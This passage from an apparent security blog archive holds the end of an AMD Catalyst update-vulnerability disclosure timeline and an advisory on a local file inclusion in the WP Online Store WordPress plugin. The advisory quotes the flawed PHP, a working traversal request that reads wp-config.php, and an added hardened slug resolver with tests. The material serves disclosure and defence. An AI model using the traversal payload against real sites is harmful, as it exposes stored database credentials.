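    for entry in parse_entries(SAMPLE_MANIFEST):
        print(entry["Title"], check_entry(entry, "12.10"))
```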
<p><strong>Time table</strong></p>
<p>23.11.2012 – Sent a request for security contact details<br />
23.11.2012 – Vendor informs that they will only coordinate issues through their support ticket system<br />
23.11.2012 – Sent details as per request including proof of concept<br />
26.11.2012 – Vendor acknowledges receipt of details and request further contact details<br />
29.11.2012 – Vendor confirms that the team is working with their web team to address the issue<br />
10.12.2012 – Mail sent asking for a rough timeline<br />
14.12.2012 – Vendor replies informing that the driver team is still working on the issue, and that their legal team is also involved<br />
19.12.2012 – Vendor publishes advisory: http://support.amd.com/us/kbarticles/Pages/AMDauto-updatenotification.aspx<br />
17.01.2013 – Vendor releases AMD Catalyst 13.1, removing the update feature</p>
</div><!-- .entry-content -->
<footer class="entry-meta">
<span class="cat-links">
Posted in <a href="https://charlieeriksen.github.io/category/advisories/" title="View all posts in Advisories" rel="category tag">Advisories</a> </span>
<span class="sep"> / </span>
<span class="tag-links">
Tagged <a href="https://charlieeriksen.github.io/tag/amd/" rel="tag">AMD</a> </span>
<span class="sep"> / </span>
<span class="comments-link"><a href="https://charlieeriksen.github.io/2013/03/17/amd-catalyst-driver-update-vulnerability/#comments" title="Comment on AMD Catalyst driver update vulnerability">2 Comments</a></span>
<span class="sep"> / </span>
</footer><!-- #entry-meta -->
</article><!-- #post-228 -->
<article id="post-173" class="post-173 post type-post status-publish format-standard hentry category-advisories tag-lfi tag-wordpress-plugin tag-wp-online-store">
<header class="entry-header">
<div class="entry-meta">
<a href="https://charlieeriksen.github.io/2013/02/18/wordpress-online-store-local-file-inclusion-vulnerability/" title="10:44 am" rel="bookmark" class="entry-date"><time datetime="2013-02-18T10:44:58+00:00" pubdate>February 18, 2013</time></a> by Charlie Eriksen </div><!-- .entry-meta -->
<h2 class="entry-title"><a href="https://charlieeriksen.github.io/2013/02/18/wordpress-online-store-local-file-inclusion-vulnerability/" title="Permalink to WordPress Online Store local file inclusion vulnerability" rel="bookmark">WordPress Online Store local file inclusion vulnerability</a></h2>
</header><!-- .entry-header -->
<div class="entry-content">
<p><strong>Advisory</strong></p>
<p><a href="http://secunia.com/advisories/50836/">Secunia Advisory SA50836</a></p>
<p><strong>Analysis of vulnerability</strong></p>
<p>The WP Online Store exposes a shortcode for displaying the store, which is declared in <a href="http://plugins.trac.wordpress.org/browser/wp-online-store/trunk/core.php?rev=570208">core.php</a>:</p><!-- Crayon Syntax Highlighter v2.5.0 -->
<div id="crayon-53c98e7809fd5088432456" class="crayon-syntax crayon-theme-twilight crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; float: none; clear: both; font-size: 12px !important; line-height: 15px !important;">
<div class="crayon-toolbar" data-settings=" mouseover hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div>
<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
/* front end begins here */
function WP_online_store()
{
    //global $currencies,$currency,$messageStack,$tree,$categories_string, $cPath_array;
    //global $request_type, $session_started, $SID;
    if (!isset($_REQUEST['slug'])) {
        include(WP_PLUGIN_DIR.'/'.basename(dirname(__FILE__)).'/index.php');
    }
    if ($_REQUEST['slug']) {
        include(WP_PLUGIN_DIR.'/'.basename(dirname(__FILE__)).'/'.$_REQUEST['slug']);
    }
}</textarea></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tr class="crayon-row">
<td class="crayon-nums " data-settings="show">
<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-53c98e7809fd5088432456-192">192</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809fd5088432456-193">193</div><div class="crayon-num" data-line="crayon-53c98e7809fd5088432456-194">194</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809fd5088432456-195">195</div><div class="crayon-num" data-line="crayon-53c98e7809fd5088432456-196">196</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809fd5088432456-197">197</div><div class="crayon-num" data-line="crayon-53c98e7809fd5088432456-198">198</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809fd5088432456-199">199</div><div class="crayon-num" data-line="crayon-53c98e7809fd5088432456-200">200</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809fd5088432456-201">201</div><div class="crayon-num" data-line="crayon-53c98e7809fd5088432456-202">202</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809fd5088432456-203">203</div><div class="crayon-num" data-line="crayon-53c98e7809fd5088432456-204">204</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-line" id="crayon-53c98e7809fd5088432456-192"><span class="crayon-c">/* front end begins here */</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809fd5088432456-193"><span class="crayon-t">function</span><span class="crayon-h"> </span><span class="crayon-e">WP_online_store</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span></div><div class="crayon-line" id="crayon-53c98e7809fd5088432456-194"><span class="crayon-sy">{</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809fd5088432456-195"><span class="crayon-h"> </span><span class="crayon-c">//global $currencies,$currency,$messageStack,$tree,$categories_string, $cPath_array;</span></div><div class="crayon-line" id="crayon-53c98e7809fd5088432456-196"><span class="crayon-h"> </span><span class="crayon-c">//global $request_type, $session_started, $SID;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809fd5088432456-197"><span class="crayon-h"> </span><span class="crayon-st">if</span><span class="crayon-h"> </span><span class="crayon-sy">(</span><span class="crayon-o">!</span><span class="crayon-e">isset</span><span class="crayon-sy">(</span><span class="crayon-sy">$</span><span class="crayon-v">_REQUEST</span><span class="crayon-sy">[</span><span class="crayon-s">'slug'</span><span class="crayon-sy">]</span><span class="crayon-sy">)</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-sy">{</span></div><div class="crayon-line" id="crayon-53c98e7809fd5088432456-198"><span class="crayon-h"> </span><span class="crayon-e">include</span><span class="crayon-sy">(</span><span class="crayon-v">WP_PLUGIN_DIR</span><span class="crayon-sy">.</span><span class="crayon-s">'/'</span><span class="crayon-sy">.</span><span class="crayon-e">basename</span><span 
class="crayon-sy">(</span><span class="crayon-e">dirname</span><span class="crayon-sy">(</span><span class="crayon-i">__FILE__</span><span class="crayon-sy">)</span><span class="crayon-sy">)</span><span class="crayon-sy">.</span><span class="crayon-s">'/index.php'</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809fd5088432456-199"><span class="crayon-h"> </span><span class="crayon-sy">}</span></div><div class="crayon-line" id="crayon-53c98e7809fd5088432456-200"><span class="crayon-h"> </span><span class="crayon-st">if</span><span class="crayon-h"> </span><span class="crayon-sy">(</span><span class="crayon-sy">$</span><span class="crayon-v">_REQUEST</span><span class="crayon-sy">[</span><span class="crayon-s">'slug'</span><span class="crayon-sy">]</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-sy">{</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809fd5088432456-201"><span class="crayon-h"> </span><span class="crayon-e">include</span><span class="crayon-sy">(</span><span class="crayon-v">WP_PLUGIN_DIR</span><span class="crayon-sy">.</span><span class="crayon-s">'/'</span><span class="crayon-sy">.</span><span class="crayon-e">basename</span><span class="crayon-sy">(</span><span class="crayon-e">dirname</span><span class="crayon-sy">(</span><span class="crayon-i">__FILE__</span><span class="crayon-sy">)</span><span class="crayon-sy">)</span><span class="crayon-sy">.</span><span class="crayon-s">'/'</span><span class="crayon-sy">.</span><span class="crayon-sy">$</span><span class="crayon-v">_REQUEST</span><span class="crayon-sy">[</span><span class="crayon-s">'slug'</span><span class="crayon-sy">]</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span></div><div class="crayon-line" id="crayon-53c98e7809fd5088432456-202"><span class="crayon-h"> </span><span class="crayon-sy">}</span></div><div 
class="crayon-line crayon-striped-line" id="crayon-53c98e7809fd5088432456-203"> </div><div class="crayon-line" id="crayon-53c98e7809fd5088432456-204"><span class="crayon-sy">}</span></div></div></td>
</tr>
</table>
</div>
</div>
<p></p><!-- Crayon Syntax Highlighter v2.5.0 -->
<div id="crayon-53c98e7809fdf284956772" class="crayon-syntax crayon-theme-twilight crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; float: none; clear: both; font-size: 12px !important; line-height: 15px !important;">
<div class="crayon-toolbar" data-settings=" mouseover hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div>
<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
add_shortcode('WP_online_store', 'WP_online_store');</textarea></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tr class="crayon-row">
<td class="crayon-nums " data-settings="show">
<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-53c98e7809fdf284956772-222">222</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-line" id="crayon-53c98e7809fdf284956772-222"><span class="crayon-e">add_shortcode</span><span class="crayon-sy">(</span><span class="crayon-s">'WP_online_store'</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-s">'WP_online_store'</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span></div></div></td>
</tr>
</table>
</div>
</div>
<p>If the “slug” request parameter isn’t set, the shortcode loads the store’s index page. If it is set, it includes whatever file the parameter names. It does not, however, verify that “slug” refers to a WP Online Store file, so the value can traverse out of the plugin directory. This is a local file inclusion vulnerability: create a post or page containing the text “[WP_online_store]” and submit a request with the slug set like this:</p><!-- Crayon Syntax Highlighter v2.5.0 -->
<div id="crayon-53c98e7809fe6793789827" class="crayon-syntax crayon-theme-twilight crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; float: none; clear: both; font-size: 12px !important; line-height: 15px !important;">
<div class="crayon-toolbar" data-settings=" mouseover hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div>
<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
http://192.168.80.130/wordpress/?slug=../../../wp-config.php</textarea></div>
</div>
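The request above works because the plugin hands an unconstrained <code>slug</code> parameter to a file include. As an added example that is not the plugin's or the author's code, the PHP below shows how a template-loading handler can resolve a slug so that the advisory's <code>../../../wp-config.php</code> value, and a symlink that passes the character allowlist, are both rejected; the function and directory names are assumptions, and the demo assumes a Unix host so that <code>symlink()</code> is available.

```php
<?php
// Added example, not the plugin's own code: a slug resolver that cannot be
// steered outside the plugin's template directory. Function and directory
// names are illustrative assumptions; the demo tree assumes a Unix host.

// Return the canonical template path for $slug, or null if the slug is
// malformed, does not exist, or resolves outside $baseDir.
function resolve_template_slug(string $baseDir, string $slug): ?string
{
    // 1. Allowlist slug characters: '/', '\', '.' and NUL never get through.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $slug)) {
        return null;
    }
    // 2. Canonicalise: realpath() collapses '..' and symlinks, and returns
    //    false for a path that does not exist.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $slug . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    // 3. Confine: the canonical file must lie strictly below the base dir.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo tree: templates three levels below a decoy wp-config.php,
// the same depth the advisory's ../../../ traversal climbs.
$root      = sys_get_temp_dir() . '/slug-demo-' . uniqid();
$templates = $root . '/a/b/templates';
mkdir($templates, 0700, true);
file_put_contents($templates . '/product.php', "<?php // product template\n");
file_put_contents($root . '/wp-config.php', "<?php // decoy config\n");
symlink($root . '/wp-config.php', $templates . '/link.php'); // passes the regex

$checks = [
    'plain slug resolves'        => resolve_template_slug($templates, 'product') === realpath($templates . '/product.php'),
    'traversal payload rejected' => resolve_template_slug($templates, '../../../wp-config.php') === null,
    'symlink escape rejected'    => resolve_template_slug($templates, 'link') === null,
    'unknown slug rejected'      => resolve_template_slug($templates, 'missing') === null,
];
foreach ($checks as $label => $ok) {
    echo str_pad($label, 28) . ($ok ? 'ok' : 'FAIL') . PHP_EOL;
}
// Remove the temporary tree.
array_map('unlink', [$templates . '/link.php', $templates . '/product.php', $root . '/wp-config.php']);
array_map('rmdir', [$templates, $root . '/a/b', $root . '/a', $root]);
```

The symlink case is why the prefix check after realpath() is kept even though the regex already blocks dots and slashes: an attacker-controlled link inside the template directory would otherwise pass step 1 and still pull in a file from outside it.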
</div><!-- .entry-content -->
<footer class="entry-meta">
<span class="cat-links">
Posted in <a href="https://charlieeriksen.github.io/category/advisories/" title="View all posts in Advisories" rel="category tag">Advisories</a> </span>
<span class="sep"> / </span>
<span class="tag-links">
Tagged <a href="https://charlieeriksen.github.io/tag/lfi/" rel="tag">LFI</a>, <a href="https://charlieeriksen.github.io/tag/wordpress-plugin/" rel="tag">Wordpress plugin</a>, <a href="https://charlieeriksen.github.io/tag/wp-online-store/" rel="tag">WP Online Store</a> </span>
<span class="sep"> / </span>
<span class="comments-link"><a href="https://charlieeriksen.github.io/2013/02/18/wordpress-online-store-local-file-inclusion-vulnerability/#comments" title="Comment on WordPress Online Store local file inclusion vulnerability">1 Comment</a></span>
<span class="sep"> / </span>
</footer><!-- #entry-meta -->
</article><!-- #post-173 -->
</div><!-- #content -->
</div><!-- #primary -->
</div><!-- #main -->
</div><!-- #page -->